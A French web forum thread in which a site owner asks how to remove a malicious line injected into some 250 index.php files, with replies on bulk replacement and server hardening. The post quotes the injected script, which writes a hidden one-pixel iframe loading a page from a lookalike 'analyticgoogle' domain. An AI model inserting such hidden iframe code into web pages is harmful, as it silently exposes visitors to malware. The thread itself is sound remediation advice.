IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

attaque logiciel malveillant javascript dans fichier


Sujet :

Sécurité

  1. #1
    Nouveau candidat au Club
    Inscrit en
    Janvier 2011
    Messages
    1
    Détails du profil
    Informations forums :
    Inscription : Janvier 2011
    Messages : 1
    Par défaut attaque logiciel malveillant javascript dans fichier
    Salut à tous,

    J'ai vu que avast bloqué l'accès à mes sites à cause d'un logiciel malveillant.
    J'ai donc changé mes mots de passe et j'ai envoyé mes fichiers de mon serveur vers mon Pc pour faire une analyse avec Avast.

    A la fin j'ai plus de 250 fichies infectés. Ce sont quasiment tous des index.php et la ligne de code ajouté est :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <!-- counter --><script language=javascript>status=location;document.write('<iframe src="h**p://analyticgoogle.com/stats/xtjsbwcvhokqdpav.php" width="1" height="1" frameborder="0"></iframe>');</script><!-- counter -->
    (j'ai remplacé "tt" par "**" pour éviter de faire un lien)

    Je voulais savoir si il existe un moyen d'enlever cette ligne de tous mes fichiers rapidement ou si je dois le faire manuellement fichier par fichier??
    J'ai tenté une réparation avec avast mais cela ne marche pas. Remplacer tous les fichiers par les originaux me prendrait également pas mal de temps je crois.

    Merci d'avance pour votre aide

  2. #2
    Membre éprouvé
    Homme Profil pro
    Chef d'entreprise
    Inscrit en
    Novembre 2010
    Messages
    94
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Chef d'entreprise
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Novembre 2010
    Messages : 94
    Par défaut
    Bonjour,

    Pour remplacer un texte dans plusieurs fichiers, tu trouveras probablement ton bonheur sur ces sites :
    http://membres.multimania.fr/mulligan/txtrpl.htm : un utilitaire pouvant tourner sur Windows
    http://pwet.fr/blog/remplacer_du_tex...s_des_dossiers : sur Linux (ou autre Unix-like)

    Je vous conseille quand même de réaliser un audit de sécurité pour s'assurer que la vulnérabilité ayant été utilisée pour modifier vos fichiers ne sera pas ré-exploitée.

    Cordialement,
    Thomas Feron de Backsmash

  3. #3
    Invité
    Invité(e)
    Par défaut
    Bonjour,
    Il ne faut pas rêver, il faudra nettoyer a la main et 250 fichiers c'est rien a faire !
    Par contre la source de ta faille c'est autre chose.
    Je te signales quelques points

    1) Fais changer ton login FTP de suite
    2) Contrôles que tout tes répertoires sont au moins 0755
    3) Contrôles que tout tes fichiers sont au moins 0644
    4) repasses en revue tes contrôles des POST GET FILES UPLOAD etc...
    5) sécurises tes includes avec un jeton
    6) sécurises tout Mysql y compris login a changer
    7) Mets des index bloquants dans tout tes répertoires.
    8) Recherches en détail tout fichier inconnu de toi !

  4. #4
    Membre Expert
    Avatar de laurentSc
    Homme Profil pro
    Webmaster débutant perpétuel !
    Inscrit en
    Octobre 2006
    Messages
    10 497
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 61
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Webmaster débutant perpétuel !
    Secteur : Industrie

    Informations forums :
    Inscription : Octobre 2006
    Messages : 10 497
    Billets dans le blog
    1
    Par défaut
    J'imagine une solution pour le faire automatiquement :
    • mettre ces fichiers sur FTP

    • en PHP, les ouvrir via une boucle (et fopen pour les ouvrir)

    • sur chacun, faire le remplacement (fwrite pour écrire dans le fichier)

    • refermer chaque fichier (fclose), puis remettre tout sur le disque dur

  5. #5
    Membre Expert
    Avatar de Eric2a
    Homme Profil pro
    Technicien
    Inscrit en
    Septembre 2005
    Messages
    1 225
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 54
    Localisation : France, Corse (Corse)

    Informations professionnelles :
    Activité : Technicien

    Informations forums :
    Inscription : Septembre 2005
    Messages : 1 225
    Par défaut
    Salut,

    +1 Mauriser

    9) Scanner ton PC (et pas uniquement les fichiers provenant du serveur).

Discussions similaires

  1. Récupérer une variable javascript (dans fichier txt ou autre chose)
    Par theos37 dans le forum Général JavaScript
    Réponses: 9
    Dernier message: 01/09/2011, 16h14
  2. Code malveillant inséré dans fichiers sources
    Par gwenBZH dans le forum Sécurité
    Réponses: 1
    Dernier message: 10/07/2010, 20h27
  3. [XL-2007] Format javascript dans fichier texte via urldownloadtofile VBA
    Par patbo2 dans le forum Macros et VBA Excel
    Réponses: 2
    Dernier message: 05/10/2009, 12h44
  4. [PHP-JS] utilisation javascript dans fichier php model mvc
    Par ramdamriddim dans le forum Langage
    Réponses: 3
    Dernier message: 19/05/2009, 14h57
  5. Réponses: 8
    Dernier message: 29/01/2006, 16h48

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo